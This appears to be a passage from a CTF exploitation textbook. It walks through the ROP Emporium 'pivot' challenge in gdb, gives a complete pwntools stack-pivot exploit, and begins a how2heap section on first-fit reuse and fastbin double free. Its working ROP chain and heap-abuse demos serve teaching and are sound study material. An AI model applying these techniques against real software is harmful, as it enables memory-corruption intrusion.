ESP: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EIP: 0x804889f (<pwnme+173>:    leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048896 <pwnme+164>:       call   0x80485b0 <fgets@plt>
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
=> 0x804889f <pwnme+173>:       leave  
   0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
0004| 0xffe7ec44 ('A' <repeats 36 times>, "\f\317U\367\237\210\004\b\n")
0008| 0xffe7ec48 ('A' <repeats 32 times>, "\f\317U\367\237\210\004\b\n")
0012| 0xffe7ec4c ('A' <repeats 28 times>, "\f\317U\367\237\210\004\b\n")
0016| 0xffe7ec50 ('A' <repeats 24 times>, "\f\317U\367\237\210\004\b\n")
0020| 0xffe7ec54 ('A' <repeats 20 times>, "\f\317U\367\237\210\004\b\n")
0024| 0xffe7ec58 ('A' <repeats 16 times>, "\f\317U\367\237\210\004\b\n")
0028| 0xffe7ec5c ('A' <repeats 12 times>, "\f\317U\367\237\210\004\b\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804889f in pwnme ()
gdb-peda$ x/10w 0xffe7ec68
0xffe7ec68:     0xf755cf0c      0x0804889f      0xf755000a      0x00000000
0xffe7ec78:     0x00000002      0x00000000      0x00000001      0xffe7ed44
0xffe7ec88:     0xf755cf10      0xf655d010
gdb-peda$ x/10w 0xf755cf0c
0xf755cf0c:     0x00000000      0x080485f0      0x080488c0      0x0804a024
0xf755cf1c:     0x080488c4      0x08048571      0x000001f7      0x080488c7
0xf755cf2c:     0x080486a3      0x0000000a

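Before the first leave; ret executes, EBP (0xffe7ec68) points to the slot holding the fake ebp, 0xf755cf0c. The fake ebp in turn points to the main payload's ebp slot, and right after the fake ebp on the stack is the return address, 0x0804889f, the address of leave; ret.

Execute the first leave: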

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec6c --> 0x804889f (<pwnme+173>:     leave)
EIP: 0x80488a0 (<pwnme+174>:    ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
   0x804889f <pwnme+173>:       leave  
=> 0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
   0x80488a7 <uselessFunction+6>:       call   0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec6c --> 0x804889f (<pwnme+173>:    leave)
0004| 0xffe7ec70 --> 0xf755000a --> 0x0
0008| 0xffe7ec74 --> 0x0
0012| 0xffe7ec78 --> 0x2
0016| 0xffe7ec7c --> 0x0
0020| 0xffe7ec80 --> 0x1
0024| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0028| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()

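The value of EBP, 0xffe7ec68, is copied into ESP; then 0xf755cf0c, the fake ebp, is popped from the stack into EBP. ESP advances by 4 to 0xffe7ec6c, which holds the address of the second leave.

Execute the first ret: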

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0xf755cf0c --> 0x0
ESP: 0xffe7ec70 --> 0xf755000a --> 0x0
EIP: 0x804889f (<pwnme+173>:    leave)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048896 <pwnme+164>:       call   0x80485b0 <fgets@plt>
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
=> 0x804889f <pwnme+173>:       leave  
   0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffe7ec70 --> 0xf755000a --> 0x0
0004| 0xffe7ec74 --> 0x0
0008| 0xffe7ec78 --> 0x2
0012| 0xffe7ec7c --> 0x0
0016| 0xffe7ec80 --> 0x1
0020| 0xffe7ec84 --> 0xffe7ed44 --> 0xffe808cf ("./pivot32")
0024| 0xffe7ec88 --> 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
0028| 0xffe7ec8c --> 0xf655d010 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804889f in pwnme ()

EIP is now 0x804889f and ESP has advanced by 4.

The second leave:

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>: jmp    DWORD PTR ds:0x804a024)
EIP: 0x80488a0 (<pwnme+174>:    ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804889b <pwnme+169>:       add    esp,0x10
   0x804889e <pwnme+172>:       nop
   0x804889f <pwnme+173>:       leave  
=> 0x80488a0 <pwnme+174>:       ret
   0x80488a1 <uselessFunction>: push   ebp
   0x80488a2 <uselessFunction+1>:       mov    ebp,esp
   0x80488a4 <uselessFunction+3>:       sub    esp,0x8
   0x80488a7 <uselessFunction+6>:       call   0x80485f0 <foothold_function@plt>
[------------------------------------stack-------------------------------------]
0000| 0xf755cf10 --> 0x80485f0 (<foothold_function@plt>:        jmp    DWORD PTR ds:0x804a024)
0004| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>:        pop    eax)
0008| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>:        push   0x30)
0012| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0016| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0020| 0xf755cf24 --> 0x1f7
0024| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0028| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488a0 in pwnme ()
gdb-peda$ x/10w 0xf755cf10
0xf755cf10:     0x080485f0      0x080488c0      0x0804a024      0x080488c4
0xf755cf20:     0x08048571      0x000001f7      0x080488c7      0x080486a3
0xf755cf30:     0x0000000a      0x00000000

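The value of EBP, 0xf755cf0c, is copied into ESP, and the main payload's ebp value (0 here) is popped into EBP. ESP advances by 4 to 0xf755cf10, which is exactly the address of our main payload.

The second ret: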

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EBX: 0x0
ECX: 0xffe7ec40 ('A' <repeats 40 times>, "\f\317U\367\237\210\004\b\n")
EDX: 0xf7731860 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf14 --> 0x80488c0 (<usefulGadgets>: pop    eax)
EIP: 0x80485f0 (<foothold_function@plt>:        jmp    DWORD PTR ds:0x804a024)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80485e0 <exit@plt>:        jmp    DWORD PTR ds:0x804a020
   0x80485e6 <exit@plt+6>:      push   0x28
   0x80485eb <exit@plt+11>:     jmp    0x8048580
=> 0x80485f0 <foothold_function@plt>:   jmp    DWORD PTR ds:0x804a024
 | 0x80485f6 <foothold_function@plt+6>: push   0x30
 | 0x80485fb <foothold_function@plt+11>:        jmp    0x8048580
 | 0x8048600 <__libc_start_main@plt>:   jmp    DWORD PTR ds:0x804a028
 | 0x8048606 <__libc_start_main@plt+6>: push   0x38
 |->   0x80485f6 <foothold_function@plt+6>:     push   0x30
       0x80485fb <foothold_function@plt+11>:    jmp    0x8048580
       0x8048600 <__libc_start_main@plt>:       jmp    DWORD PTR ds:0x804a028
       0x8048606 <__libc_start_main@plt+6>:     push   0x38
                                                                  JUMP is taken
[------------------------------------stack-------------------------------------]
0000| 0xf755cf14 --> 0x80488c0 (<usefulGadgets>:        pop    eax)
0004| 0xf755cf18 --> 0x804a024 --> 0x80485f6 (<foothold_function@plt+6>:        push   0x30)
0008| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0012| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0016| 0xf755cf24 --> 0x1f7
0020| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0024| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0028| 0xf755cf30 --> 0xa ('\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080485f0 in foothold_function@plt ()

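Execution has jumped to foothold_function@plt. The dynamic linker now goes through _dl_runtime_resolve and related steps and writes the real address into .got.plt. Our gadgets then read that address, add the offset to obtain the address of ret2win(), and call it, which completes the exploit.

The address leak, step by step: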

gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x54 ('T')
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>:      push   ebp)
EIP: 0x80488c0 (<usefulGadgets>:        pop    eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488ba:   xchg   ax,ax
   0x80488bc:   xchg   ax,ax
   0x80488be:   xchg   ax,ax
=> 0x80488c0 <usefulGadgets>:   pop    eax
   0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xf755cf18 --> 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
0004| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0008| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0012| 0xf755cf24 --> 0x1f7
0016| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0020| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0024| 0xf755cf30 --> 0xa ('\n')
0028| 0xf755cf34 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c0 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:       mov    eax,DWORD PTR [eax])
EIP: 0x80488c1 (<usefulGadgets+1>:      ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488bc:   xchg   ax,ax
   0x80488be:   xchg   ax,ax
   0x80488c0 <usefulGadgets>:   pop    eax
=> 0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
   0x80488c6 <usefulGadgets+6>: ret
[------------------------------------stack-------------------------------------]
0000| 0xf755cf1c --> 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
0004| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0008| 0xf755cf24 --> 0x1f7
0012| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0016| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0020| 0xf755cf30 --> 0xa ('\n')
0024| 0xf755cf34 --> 0x0
0028| 0xf755cf38 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c1 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x804a024 --> 0xf7772770 (<foothold_function>:     push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>:      pop    ebx)
EIP: 0x80488c4 (<usefulGadgets+4>:      mov    eax,DWORD PTR [eax])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488c1 <usefulGadgets+1>: ret
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
=> 0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
   0x80488c6 <usefulGadgets+6>: ret
   0x80488c7 <usefulGadgets+7>: add    eax,ebx
   0x80488c9 <usefulGadgets+9>: ret
   0x80488ca <usefulGadgets+10>:        xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c4 in usefulGadgets ()
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xf7772770 (<foothold_function>:   push   ebp)
EBX: 0x0
ECX: 0x54 ('T')
EDX: 0xf7731854 --> 0x0
ESI: 0xf772fe28 --> 0x1d1d30
EDI: 0x0
EBP: 0x0
ESP: 0xf755cf20 --> 0x8048571 (<_init+33>:      pop    ebx)
EIP: 0x80488c6 (<usefulGadgets+6>:      ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488c2 <usefulGadgets+2>: xchg   esp,eax
   0x80488c3 <usefulGadgets+3>: ret
   0x80488c4 <usefulGadgets+4>: mov    eax,DWORD PTR [eax]
=> 0x80488c6 <usefulGadgets+6>: ret
   0x80488c7 <usefulGadgets+7>: add    eax,ebx
   0x80488c9 <usefulGadgets+9>: ret
   0x80488ca <usefulGadgets+10>:        xchg   ax,ax
   0x80488cc <usefulGadgets+12>:        xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xf755cf20 --> 0x8048571 (<_init+33>:     pop    ebx)
0004| 0xf755cf24 --> 0x1f7
0008| 0xf755cf28 --> 0x80488c7 (<usefulGadgets+7>:      add    eax,ebx)
0012| 0xf755cf2c --> 0x80486a3 (<deregister_tm_clones+35>:      call   eax)
0016| 0xf755cf30 --> 0xa ('\n')
0020| 0xf755cf34 --> 0x0
0024| 0xf755cf38 --> 0x0
0028| 0xf755cf3c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080488c6 in usefulGadgets ()
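The trace stops once the GOT value is in EAX; the two remaining gadgets, add eax, ebx and call eax, only perform one addition and one jump. As a quick check of the arithmetic in Python 3, using the values from this particular run (they change under ASLR):

```python
MASK32 = 0xffffffff

foothold_leaked = 0xf7772770   # value loaded from the GOT entry in the trace above
offset = 0x1f7                 # ret2win - foothold_function inside libpivot32.so

def add_eax_ebx(eax, ebx):
    """Effect of `add eax, ebx` on a 32-bit register (wraps at 2**32)."""
    return (eax + ebx) & MASK32

ret2win = add_eax_ebx(foothold_leaked, offset)
print(hex(ret2win))
```

Only the leaked address varies between runs; the offset is a property of the library file and stays constant.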

pivot

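This is essentially the same as above, but you can try to change rsp with gadgets as well. The advantage is that we do not need to forge a stack frame, so we do not have to care about the rbp value. For example: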

payload_2  = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)

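This is in fact the method I used, because when building the payload I found that the address of leave; ret (0x0000000000400ae0 <+165>: leave) contains the terminating byte 0a, so it cannot be written into the buffer in the normal way. That can be worked around: first replace 0a with a harmless byte, then use registers to write 0a back into place, which is the usual way of dealing with terminating characters in a buffer. It is considerably harder, though, and not recommended; interested readers may want to try it.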
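Checking addresses for terminating bytes is easy to automate before a chain is built. The Python 3 sketch below assumes the input is read line by line, so that only the newline byte cuts it short; truncating_bytes is a hypothetical helper, and struct stands in for pwntools' p64.

```python
import struct

def p64(value):
    return struct.pack("<Q", value)

def truncating_bytes(addr, bad=b"\n"):
    """Return the bad bytes that occur in the packed form of addr."""
    packed = p64(addr)
    return bytes(b for b in bad if b in packed)

candidates = {
    "leave": 0x0000000000400ae0,
    "pop rax; ret": 0x0000000000400b00,
    "xchg rax, rsp; ret": 0x0000000000400b02,
}
for name, addr in candidates.items():
    print(name, hex(addr), truncating_bytes(addr))
```

The leave address packs to e0 0a 40 00 ..., which contains the newline byte, while the pop rax and xchg rax, rsp gadgets do not.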

$ ropgadget --binary pivot --only "mov|pop|call|add|xchg|ret"
0x0000000000400b09 : add rax, rbp ; ret
0x000000000040098e : call rax
0x0000000000400b05 : mov rax, qword ptr [rax] ; ret
0x0000000000400b00 : pop rax ; ret
0x0000000000400900 : pop rbp ; ret
0x0000000000400b02 : xchg rax, rsp ; ret

The complete exploit is as follows:

from pwn import *

#context.log_level = 'debug'
#context.terminal = ['konsole']
io = process('./pivot')
elf = ELF('./pivot')
libp = ELF('./libpivot.so')

leave_ret = 0x0000000000400adf

foothold_plt     = elf.plt['foothold_function'] # 0x400850
foothold_got_plt = elf.got['foothold_function'] # 0x602048

pop_rax      = 0x0000000000400b00
pop_rbp      = 0x0000000000400900
mov_rax_rax  = 0x0000000000400b05
xchg_rax_rsp = 0x0000000000400b02
add_rax_rbp  = 0x0000000000400b09
call_rax     = 0x000000000040098e

foothold_sym = libp.symbols['foothold_function']
ret2win_sym  = libp.symbols['ret2win']
offset = int(ret2win_sym - foothold_sym) # 0x14e

leakaddr  = int(io.recv().split()[20], 16)

# call foothold_function() to populate its GOT entry, then load that value into RAX
#gdb.attach(io)
payload_1  = p64(foothold_plt)
payload_1 += p64(pop_rax)
payload_1 += p64(foothold_got_plt)
payload_1 += p64(mov_rax_rax)
payload_1 += p64(pop_rbp)
payload_1 += p64(offset)
payload_1 += p64(add_rax_rbp)
payload_1 += p64(call_rax)

io.sendline(payload_1)

# rsp = leakaddr
payload_2  = "A" * 40
payload_2 += p64(pop_rax)
payload_2 += p64(leakaddr)
payload_2 += p64(xchg_rax_rsp)

io.sendline(payload_2)
print io.recvall()

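That concludes the basics of ROP. More advanced uses are covered in later chapters; "advanced" simply means more ingenious gadget chains and lower-level use of operating system knowledge.

3.1.6 Linux Heap Exploitation (Part 1)

Introduction to the Linux Heap

The heap is a contiguous region of a program's virtual address space that grows from low addresses toward high addresses. The heap allocator currently used on Linux is ptmalloc2, implemented in glibc.

We covered this in more detail in section 1.5.8, and section 1.5.7 has related material; please review them.

Unlike a stack overflow, which can overwrite a function's return address directly and thereby control EIP, heap exploitation has to hijack the program's control flow by indirect means.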

how2heap

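how2heap is a heap exploitation tutorial produced by the Shellphish team that introduces a variety of heap exploitation techniques, and this section works through it. An Ubuntu 16.04 64-bit environment is recommended, with the following glibc version: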

$ file /lib/x86_64-linux-gnu/libc-2.23.so
/lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=088a6e00a1814622219f346b41e775b8dd46c518, for GNU/Linux 2.6.32, stripped
$ git clone https://github.com/shellphish/how2heap.git
$ cd how2heap
$ make

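Note that the code shown below has been simplified: I removed or changed some unnecessary comments and code to make it easier to study. Also, as discussed in section 4.3, adding the compiler flag CFLAGS += -fsanitize=address enables detection of memory errors.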

first_fit

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char* a = malloc(512);
    char* b = malloc(256);
    char* c;

    fprintf(stderr, "1st malloc(512): %p\n", a);
    fprintf(stderr, "2nd malloc(256): %p\n", b);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    fprintf(stderr, "first allocation %p points to %s\n", a, a);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    c = malloc(500);
    fprintf(stderr, "3rd malloc(500): %p\n", c);
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
    fprintf(stderr, "first allocation %p points to %s\n", a, a);
}
$ gcc -g first_fit.c
$ ./a.out
1st malloc(512): 0x1380010
2nd malloc(256): 0x1380220
first allocation 0x1380010 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x1380010
3rd allocation 0x1380010 points to CCCCCCCC
first allocation 0x1380010 points to CCCCCCCC

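This first program demonstrates glibc's heap allocation strategy, first-fit. When allocating memory, malloc first looks in the unsorted bin (or the fastbins) for a suitable freed chunk. If none is found, it moves every chunk in the unsorted bin into the bin it belongs to and then searches those bins for a suitable chunk. As the output shows, the third malloc returns the same address as the first: malloc found the chunk released by the first free and handed it out again.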

Debugging in gdb, after the two mallocs (a chunk starts 0x10 bytes before the address returned by malloc):

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a
0x602010:   0x4141414141414141  0x0000000000000000
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000000  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

After the first free, chunk a is added to the unsorted bin:

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk a [be freed]
0x602010:   0x00007ffff7dd1b78  0x00007ffff7dd1b78      <-- fd pointer, bk pointer
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000110 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x210, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.

After the third malloc:

gef➤  x/5gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000211 <-- chunk c
0x602010:   0x4343434343434343  0x00007ffff7dd1d00
0x602020:   0x0000000000000000
gef➤  x/5gx 0x602220-0x10
0x602210:   0x0000000000000210  0x0000000000000111 <-- chunk b
0x602220:   0x4242424242424242  0x0000000000000000
0x602230:   0x0000000000000000

So when a block of memory is freed and a slightly smaller block is then requested, glibc tends to hand the previously freed space out again.
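The chunk sizes seen in the gdb session (0x211 for malloc(512), 0x111 for malloc(256)) follow from how glibc rounds a request up to a chunk size. The sketch below re-implements that rounding in Python as an illustration only; the constants assume a 64-bit build, and the names simply mirror the glibc macros. It also shows why malloc(500) receives the whole freed 0x210 chunk: the leftover would be smaller than the minimum chunk size, so the chunk is not split.

```python
# Toy re-implementation of glibc's request2size() for a 64-bit build.
# The constants are the usual x86-64 values; treat them as assumptions.
SIZE_SZ = 8                          # sizeof(size_t)
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # chunks are 16-byte aligned
MINSIZE = 4 * SIZE_SZ                # smallest possible chunk (0x20)


def request2size(req: int) -> int:
    """Return the chunk size used for a malloc(req) call."""
    padded = req + SIZE_SZ + MALLOC_ALIGN_MASK
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


freed = request2size(512)    # chunk a, sitting in the unsorted bin after free(a)
wanted = request2size(500)   # chunk c
remainder = freed - wanted

print(hex(freed), hex(wanted), hex(remainder))

# A remainder below MINSIZE cannot form a chunk of its own,
# so the allocator hands out the whole freed chunk.
reuses_whole_chunk = wanted <= freed and remainder < MINSIZE
```

The low bit of the size field (PREV_INUSE) is not part of the size itself, which is why gdb shows 0x211 rather than 0x210.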

Now recompile with the memory-checking flag:

$ gcc -fsanitize=address -g first_fit.c
$ ./a.out
1st malloc(512): 0x61500000fd00
2nd malloc(256): 0x611000009f00
first allocation 0x61500000fd00 points to AAAAAAAA
Freeing the first one...
3rd malloc(500): 0x61500000fa80
3rd allocation 0x61500000fa80 points to CCCCCCCC
=================================================================
==4525==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500000fd00 at pc 0x7f49d14a61e9 bp 0x7ffe40b526e0 sp 0x7ffe40b51e58
READ of size 2 at 0x61500000fd00 thread T0
    #0 0x7f49d14a61e8  (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601e8)
    #1 0x7f49d14a6bcc in vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bcc)
    #2 0x7f49d14a6cf9 in fprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60cf9)
    #3 0x400b8b in main /home/firmy/how2heap/first_fit.c:23
    #4 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #5 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)

0x61500000fd00 is located 0 bytes inside of 512-byte region [0x61500000fd00,0x61500000ff00)
freed by thread T0 here:
    #0 0x7f49d14de2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400aa2 in main /home/firmy/how2heap/first_fit.c:17
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7f49d14de602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400957 in main /home/firmy/how2heap/first_fit.c:6
    #2 0x7f49d109c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

This is an obvious use-after-free vulnerability. How to exploit this class of bug is covered in detail in later chapters.

fastbin_dup

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    fprintf(stderr, "Allocating 3 buffers.\n");
    char *a = malloc(9);
    char *b = malloc(9);
    char *c = malloc(9);
    strcpy(a, "AAAAAAAA");
    strcpy(b, "BBBBBBBB");
    strcpy(c, "CCCCCCCC");
    fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
    fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
    fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);

    fprintf(stderr, "Freeing the first one %p.\n", a);
    free(a);
    fprintf(stderr, "Then freeing another one %p.\n", b);
    free(b);
    fprintf(stderr, "Freeing the first one %p again.\n", a);
    free(a);

    fprintf(stderr, "Allocating 3 buffers.\n");
    char *d = malloc(9);
    char *e = malloc(9);
    char *f = malloc(9);
    strcpy(d, "DDDDDDDD");
    fprintf(stderr, "4st malloc(9) %p points to %s the first time\n", d, d);
    strcpy(e, "EEEEEEEE");
    fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
    strcpy(f, "FFFFFFFF");
    fprintf(stderr, "6rd malloc(9) %p points to %s the second time\n", f, f);
}
$ gcc -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x1c07010 points to AAAAAAAA
2nd malloc(9) 0x1c07030 points to BBBBBBBB
3rd malloc(9) 0x1c07050 points to CCCCCCCC
Freeing the first one 0x1c07010.
Then freeing another one 0x1c07030.
Freeing the first one 0x1c07010 again.
Allocating 3 buffers.
4st malloc(9) 0x1c07010 points to DDDDDDDD the first time
5nd malloc(9) 0x1c07030 points to EEEEEEEE
6rd malloc(9) 0x1c07010 points to FFFFFFFF the second time

